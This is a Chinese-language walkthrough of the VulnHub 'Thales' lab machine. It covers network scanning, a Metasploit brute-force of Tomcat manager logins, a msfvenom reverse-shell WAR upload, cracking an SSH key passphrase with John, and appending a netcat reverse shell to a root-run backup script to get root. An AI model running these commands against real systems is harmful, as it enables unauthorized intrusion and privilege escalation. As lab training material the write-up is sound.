目录

前言

描述

一、信息收集

0x00 arp-scan扫描

0x01 nmap扫描

二、漏洞利用

0x00 msfconsole利用

0x01 文件上传

三、权限提升

0x00 反弹shell

0x02 字典爆破​编辑

0x03 user.txt

0x04 反弹shell

0x05 root.txt

总结

前言

描述

简介：睁开眼，换个角度

包括 2 个标志：user.txt 和 root.txt。

下载链接

https://download.vulnhub.com/thales/Thales.zip.torrent

0x00环境介绍
kali  192.168.56.102
Thales靶机  192.168.56.101

一、信息收集

0x00 arp-scan扫描

arp-scan -I eth1 -l
#扫描网卡局域网

0x01 nmap扫描

扫描到两个网段
不确定是哪个
nmap 扫描扫描两个IP

开放端口22和8080

访问站点，发现需要用户名密码

二、漏洞利用

0x00 msfconsole利用

msf搜索tomcat login

配置payload

用户名   tomcat
​
密码     role1

成功登入

0x01 文件上传

寻找功能点，发现上传点

利用kali生成war文件木马做反弹shell
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555  -f war -o myshell.war

上传成功，并运行

三、权限提升

0x00 反弹shell

监听端口

升级成交互式shell

sudo -l  #需要密码，未知
在home文件下发现用户Thales

在`notes.txt`文件中发现`/usr/local/bin/backup.sh
查看文件内容

0x02 字典爆破

发现.ssh文件夹

发现私钥可以用ssh2john.py生成密码文件爆破

用 ssh2john.py 脚本编译一下

/usr/share/john/ssh2john.py id_rsa > crack.txt

 john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

爆破出密码vodka06

切换用户

0x03 user.txt

查看user.txt---第一个flag

notes.txt是root权限的，里边可能是有东西都

0x04 反弹shell

看到backup.sh是有执行权限的，可以写入反弹shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh

文件内容编辑会直接替换，选择用追加

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh

0x05 root.txt

监听9999，写入以后过一会就自己连接了

总结

Thales学到了

msf的爆破字典的使用

rsa私钥密文的利用